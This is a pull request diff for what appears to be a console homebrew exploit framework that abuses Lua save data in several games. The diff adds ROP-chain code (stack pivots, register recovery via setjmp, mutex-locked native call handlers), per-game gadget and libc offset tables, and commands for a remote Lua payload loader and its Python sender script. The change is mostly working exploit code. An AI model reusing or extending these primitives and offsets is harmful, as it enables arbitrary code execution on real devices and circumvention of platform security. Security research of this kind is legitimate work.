### PR TITLE
Disable running payload in new thread & various small improvements

### DIFF
--- a/README.md
+++ b/README.md
@@ -17,6 +17,7 @@ This repo provides few [payloads](payloads/) for you to play around. PRs for use
 
 ## Credits
 
+* excellent blog [post](https://memorycorruption.net/posts/rce-lua-factorio/) where most of the ideas of lua primitives are taken from 
 * flatz - for sharing ideas and lua implementations
 * null_ptr - for testing & ideas
 * gezine - for sharing the vulnerable games & ideas

--- a/payloads/send_lua.py
+++ b/payloads/send_lua.py
@@ -17,6 +17,8 @@ MCONTEXT_LEN = 0x100
 
 DISABLE_THREAD = 0
 ENABLE_THREAD = 1
+DISABLE_SIGNAL_HANDLER = 2
+ENABLE_SIGNAL_HANDLER = 3
 
 
 def print_mcontext(buffer):
@@ -125,6 +127,10 @@ def main():
                         help='Enable threading for payload execution')
     group.add_argument('--disable-thread', action='store_true', 
                         help='Disable threading for payload execution')
+    group.add_argument('--enable-signal-handler', action='store_true', 
+                    help='Enable signal handler (print info in case of crash)')
+    group.add_argument('--disable-signal-handler', action='store_true', 
+                        help='Disable signal handler (print info in case of crash)')
     
     args = parser.parse_args()
     
@@ -132,6 +138,10 @@ def main():
         send_command(args.ip, args.port, DISABLE_THREAD)
     elif args.enable_thread:
         send_command(args.ip, args.port, ENABLE_THREAD)
+    elif args.disable_signal_handler:
+        send_command(args.ip, args.port, DISABLE_SIGNAL_HANDLER)
+    elif args.enable_signal_handler:
+        send_command(args.ip, args.port, ENABLE_SIGNAL_HANDLER)
     else:
         send_payload(args.ip, args.port, args.filepath)
 

--- a/savedata/main.lua
+++ b/savedata/main.lua
@@ -4,8 +4,8 @@ FW_VERSION = nil
 
 options = {
     enable_signal_handler = true,
-    run_loader_with_gc_disabled = true,
     run_payload_in_new_thread = false,
+    run_loader_with_gc_disabled = true,
 }
 
 WRITABLE_PATH = "/av_contents/content_tmp/"
@@ -189,6 +189,16 @@ function remote_lua_loader(port)
                 options.run_payload_in_new_thread = true
                 local msg = "command: Enabled running payload in thread option"
                 syscall.write(client_fd, msg, #msg)
+            elseif command == 2 then
+                signal.clear()
+                options.enable_signal_handler = false
+                local msg = "command: Disabled signal handler"
+                syscall.write(client_fd, msg, #msg)
+            elseif command == 3 then
+                signal.register()
+                options.enable_signal_handler = true
+                local msg = "command: Enabled signal handler"
+                syscall.write(client_fd, msg, #msg)
             else
                 local err = string.format("error: invalid command %d\n", command)
                 syscall.write(client_fd, err, #err)
@@ -215,7 +225,7 @@ function main()
     syscall.init()
     print("[+] syscall initialized")
 
-    native.init()
+    native.register()
     print("[+] native handler registered")
 
     print("[+] arbitrary r/w primitives achieved")
@@ -237,7 +247,7 @@ function main()
 
     -- setup signal handler
     if options.enable_signal_handler then
-        signal.init()
+        signal.register()
         print("[+] signal handler registered")
     end
 

--- a/savedata/main.lua
+++ b/savedata/main.lua
@@ -5,7 +5,7 @@ FW_VERSION = nil
 options = {
     enable_signal_handler = true,
     run_loader_with_gc_disabled = true,
-    run_payload_in_new_thread = true,
+    run_payload_in_new_thread = false,
 }
 
 WRITABLE_PATH = "/av_contents/content_tmp/"

--- a/savedata/native.lua
+++ b/savedata/native.lua
@@ -7,7 +7,7 @@ native_cmd = {
 
 native = {}
 
-function native.init()
+function native.register()
 
     local pivot_handler = gadgets.stack_pivot[2]
     native.pivot_handler_rop = native.setup_pivot_handler(pivot_handler)
@@ -157,7 +157,7 @@ function native.setup_pivot_handler(pivot_handler)
 
     syscall_mmap(pivot_handler.pivot_base, 0x2000)
 
-    -- non modifying chains
+    -- non modifying chains before fn call
     local push_fcall_with_hole = function(chain, fn_addr, ...)
         chain:push_sysv(...)
         chain:align_stack()

--- a/savedata/native.lua
+++ b/savedata/native.lua
@@ -55,7 +55,7 @@ function native.gen_fcall_chain(lua_state)
 
     -- pass return value to caller
     chain:push_fcall_raw(eboot_addrofs.lua_pushinteger, function()
-        chain:push_set_reg_from_memory("rsi", chain.retval_addr[9])
+        chain:push_set_reg_from_memory("rsi", chain:get_last_retval_addr())
         chain:push_set_reg_from_memory("rdi", lua_state)
     end)
 
@@ -108,15 +108,10 @@ function native.setup_cmd_handler(pivot_handler)
 
     chain.jmpbuf = memory.alloc(0x100)
     chain.jump_table = memory.alloc(0x8 * 16)
-    chain.lua_state = memory.alloc(0x8)
 
-    -- get lua state from pivot handler
-    chain:push_set_rax_from_memory(pivot_handler.lua_state_addr)
-    chain:push_store_rax_into_memory(chain.lua_state)
+    chain:push_fcall(libc_addrofs.Mtx_unlock, pivot_handler.lock)
 
-    chain:push_fcall(libc_addrofs.scePthreadMutexUnlock, pivot_handler.lock)
-
-    -- hacky way to recover rbp
+    -- hacky way to recover rbp & r13
     chain:push_fcall(libc_addrofs.setjmp, chain.jmpbuf)
     chain:push_set_rax_from_memory(chain.jmpbuf+0x18) -- get rbp
 
@@ -126,11 +121,13 @@ function native.setup_cmd_handler(pivot_handler)
     chain:push(gadgets["mov rax, [rax]; ret"])  -- get ret addr from rsp
     chain:push_store_rax_into_memory(chain.jmpbuf)  -- fix rip
 
+    chain.lua_state = chain.jmpbuf + 0x28  -- r13 (lua state)
+
     -- get native cmd option from caller
     native.get_lua_opt(chain, eboot_addrofs.luaL_optinteger, chain.lua_state, 2, 0)
 
     -- pivot to appropriate handler
-    chain:push_set_rax_from_memory(chain.retval_addr[1])
+    chain:push_set_rax_from_memory(chain:get_last_retval_addr())
     chain:dispatch_jumptable_with_rax_index(chain.jump_table)
 
     return chain
@@ -154,31 +151,46 @@ end
 
 function native.setup_pivot_handler(pivot_handler)
 
-    local jmpbuf = memory.alloc(0x60)
+    local MTX_DEF = 0 -- DEFAULT (sleep) lock
+
+    local Mtx_init = fcall(libc_addrofs.Mtx_init)
 
     syscall_mmap(pivot_handler.pivot_base, 0x2000)
+
+    -- non modifying chains
+    local push_fcall_with_hole = function(chain, fn_addr, ...)
+        chain:push_sysv(...)
+        chain:align_stack()
+        chain:create_hole(0x500)
+        chain:push(fn_addr)
+        chain:push_write_qword_memory(chain:get_rsp() - 0x8, fn_addr)  -- fix chain
+    end
 
     local chain = ropchain({
         stack_base = pivot_handler.pivot_addr,
     })
 
-    -- rbx = rdi (lua state)
-    -- rbx is usually preserved across fn calls
-    chain:push_set_reg_from_rdi("rbx")
-
     chain.lock = memory.alloc(0x8)
-    chain:push_fcall(libc_addrofs.scePthreadMutexLock, chain.lock)
+    Mtx_init(chain.lock, MTX_DEF)
 
-    -- hacky way to recover rbx (lua state)
-    chain:push_fcall(libc_addrofs.setjmp, jmpbuf)
-    chain.lua_state_addr = jmpbuf + 0x8
+    -- lock as this part might be called by multiple threads
+    push_fcall_with_hole(chain, libc_addrofs.Mtx_lock, chain.lock)
 
+    -- note:
+    -- we assume that r13 will always point to lua state.
+    -- this is at least true for aibeya / raspberry cube / hamidashi creative
+
+    -- hacky way to recover lua state (r13)
+    chain.jmpbuf = memory.alloc(0x100)
+    chain.lua_state = chain.jmpbuf + 0x28 -- r13
+    chain:push_fcall(libc_addrofs.setjmp, chain.jmpbuf)
+    
     -- get native cmd handler from caller
-    native.get_lua_opt(chain, eboot_addrofs.luaL_optinteger, chain.lua_state_addr, 1, 0)
+    native.get_lua_opt(chain, eboot_addrofs.luaL_optinteger, chain.lua_state, 1, 0)
 
     -- pivot to native cmd handler
-    chain:push_set_reg_from_memory("rsp", chain.retval_addr[1])
-    
+    chain:push_set_reg_from_memory("rsp", chain:get_last_retval_addr())
+
     return chain
 end
 

--- a/savedata/offsets.lua
+++ b/savedata/offsets.lua
@@ -262,11 +262,11 @@ gadget_table = {
             Thrd_exit = 0x4dda0,
             Thrd_create = 0x4df20,
 
-            Mtx_init = nil,
-            Mtx_lock = nil,
-            Mtx_unlock = nil,
+            Mtx_init = 0x4e1a0,
+            Mtx_lock = 0x4e230,
+            Mtx_unlock = 0x4e220,
 
-            Atomic_fetch_add_8 = nil,
+            Atomic_fetch_add_8 = 0x39800,
         }
     },
     hamidashi_creative = {

--- a/savedata/offsets.lua
+++ b/savedata/offsets.lua
@@ -89,8 +89,11 @@ gadget_table = {
             Thrd_exit = 0x57f50,
             Thrd_create = 0x58060,
 
-            scePthreadMutexLock = 0x1e8,
-            scePthreadMutexUnlock = 0x1f8,
+            Mtx_init = 0x582e0,
+            Mtx_lock = 0x58370,
+            Mtx_unlock = 0x58360,
+
+            Atomic_fetch_add_8 = 0x44240,
         }
     },
     aibeya = {
@@ -171,8 +174,11 @@ gadget_table = {
             Thrd_exit = 0x572e0,
             Thrd_create = 0x573f0,
 
-            scePthreadMutexLock = 0x1d8,
-            scePthreadMutexUnlock = 0x1e8,
+            Mtx_init = 0x57670,
+            Mtx_lock = 0x57700,
+            Mtx_unlock = 0x576F0,
+
+            Atomic_fetch_add_8 = 0x43900,
         }
     },
     b = {
@@ -256,8 +262,11 @@ gadget_table = {
             Thrd_exit = 0x4dda0,
             Thrd_create = 0x4df20,
 
-            scePthreadMutexLock = 0x1d8,
-            scePthreadMutexUnlock = 0x1e8,
+            Mtx_init = nil,
+            Mtx_lock = nil,
+            Mtx_unlock = nil,
+
+            Atomic_fetch_add_8 = nil,
         }
     },
     hamidashi_creative = {
@@ -341,8 +350,11 @@ gadget_table = {
             Thrd_exit = 0x4c240,
             Thrd_create = 0x4c3c0,
 
-            scePthreadMutexLock = 0x1d8,
-            scePthreadMutexUnlock = 0x1e8,
+            Mtx_init = 0x4c650,
+            Mtx_lock = 0x4c6f0,
+            Mtx_unlock = 0x4c6e0,
+
+            Atomic_fetch_add_8 = 0x37bf0,
         }
     },
     aikagi_kimi_isshoni_pack = {
@@ -424,13 +436,16 @@ gadget_table = {
             Thrd_exit = 0x57f50,
             Thrd_create = 0x58060,
 
-            scePthreadMutexLock = 0x1e8,
-            scePthreadMutexUnlock = 0x1f8,
+            Mtx_init = 0x582e0,
+            Mtx_lock = 0x58370,
+            Mtx_unlock = 0x58360,
+
+            Atomic_fetch_add_8 = 0x44240,
         }
     },
     -- not supporting new mov r9, consider dropping
     c = {
-        gadgets = {    
+        gadgets = {
             ["ret"] = 0x4c,
 
             ["pop rsp; ret"] = 0x972,
@@ -508,8 +523,11 @@ gadget_table = {
             Thrd_exit = 0x5db10,
             Thrd_create = 0x5dc20,
 
-            scePthreadMutexLock = 0x1b8,
-            scePthreadMutexUnlock = 0x1c8,
+            Mtx_init = 0x43cf0,
+            Mtx_lock = 0x43e10,
+            Mtx_unlock = 0x43db0,
+
+            Atomic_fetch_add_8 = 0x4a340,
         }
     },
     e = {
@@ -591,8 +609,11 @@ gadget_table = {
             Thrd_exit = 0x215a0,
             Thrd_create = 0x216b0,
 
-            scePthreadMutexLock = 0x248,
-            scePthreadMutexUnlock = 0x258,
+            Mtx_init = 0x21940,
+            Mtx_lock = 0x219d0,
+            Mtx_unlock = 0x219c0,
+
+            Atomic_fetch_add_8 = 0xe0c0,
         }
     },
     f = {
@@ -674,8 +695,11 @@ gadget_table = {
             Thrd_exit = 0x572e0,
             Thrd_create = 0x573f0,
 
-            scePthreadMutexLock = 0x1d8,
-            scePthreadMutexUnlock = 0x1e8,
+            Mtx_init = 0x57670,
+            Mtx_lock = 0x57700,
+            Mtx_unlock = 0x576f0,
+
+            Atomic_fetch_add_8 = 0x43900,
         }
     },
 }


### PR DESCRIPTION
Changelog:
- Improved locking on native handler when being accessed by multiple threads (still not good enough 🙁)
- Fixed chain corruption by syscall that return error value
- Various small improvements

This PR will also disable running payload in new thread because there are few unresolved issues such as locking (see `test_high_contentions` in `threading_test.lua` for reproducer that will crash the game) & limited traceback info during error (calling `debug.traceback` inside a new thread will crash the game)

To enable running payload in new thread, use send_lua.py to enable that option on runtime
